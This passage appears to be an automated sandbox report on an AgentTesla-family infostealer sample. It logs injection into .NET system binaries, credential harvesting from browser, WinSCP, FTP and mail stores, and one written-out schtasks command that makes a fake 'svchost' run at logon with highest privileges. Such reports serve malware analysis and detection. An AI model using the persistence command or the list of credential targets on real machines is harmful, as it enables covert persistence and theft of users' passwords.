Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43C000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 8AB008
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DD4008

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp990A.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 464 -p 1808 -ip 1808
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1808 -s 1044
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 3260 -ip 3260
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3260 -s 1212
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 7280 -ip 7280
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 1192
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 572 -p 7572 -ip 7572
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7572 -s 1204
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Queries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.19.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 31.2.svchost.exe.191113c5518.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f24404c2a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.1705204e0d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.svchost.exe.1911138aad0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.214522b6dd8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.svchost.exe.1911138aad0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f244086ce8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.2145227c390.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.svchost.exe.191113c5518.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.17052088b18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.17052088b18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f24404c2a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.2145227c390.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.214522b6dd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.1705204e0d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2525046983.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.3407099977.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2470873767.0000017052012000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2525046983.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2506543438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2415909441.000001F244011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2525046983.0000000002B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3406933731.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.3407099977.0000000002D09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3409529944.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2558777544.000001911138A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3409529944.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3409529944.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.3407099977.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3406933731.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2394298130.0000021452241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jsc.exe PID: 572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 31.2.svchost.exe.191113c5518.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f24404c2a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.1705204e0d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.svchost.exe.1911138aad0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.214522b6dd8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.svchost.exe.1911138aad0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f244086ce8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.2145227c390.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.svchost.exe.191113c5518.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.17052088b18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.17052088b18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f24404c2a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.2145227c390.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.214522b6dd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.1705204e0d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2470873767.0000017052012000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2525046983.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2506543438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2415909441.000001F244011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2558777544.000001911138A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3409529944.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3406933731.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2394298130.0000021452241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jsc.exe PID: 572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7572, type: MEMORYSTR
